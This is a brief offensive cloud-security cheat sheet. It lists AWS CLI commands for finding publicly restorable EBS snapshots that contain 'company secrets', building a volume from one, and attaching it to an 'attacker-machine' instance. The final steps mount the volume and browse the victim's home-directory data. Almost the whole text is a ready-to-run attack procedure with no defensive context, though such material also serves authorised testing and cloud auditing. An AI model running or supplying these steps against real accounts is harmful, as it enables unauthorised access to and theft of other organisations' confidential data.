Find secrets in public EBS
Dufflebag https://github.com/bishopfox/dufflebag
- Obtaning public snapshot name aws ec2 describe-snapshots --region us-east-1 --restorable-by-user-ids all | grep -C 10 "company secrets"
- Obtaining zone and instance aws ec2 describe-instances --filters Name=tag:Name,Values=attacker-machine
- Create a new volume of it aws ec2 create-volume --snapshot-id snap-03616657ede4b9862 --availability-zone
- Attach to an EC2 instance
aws ec2 attach-volume --device /dev/sdh --instance-id --volume-id
- It takes some time, to see the status: aws ec2 describe-volumes --filters Name=volume-id,Values=
- Once is mounted in EC2 instance, check it, mount it and access it: sudo lsblk sudo mount /dev/xvdh1 /mnt cd /mnt/home/user/companydata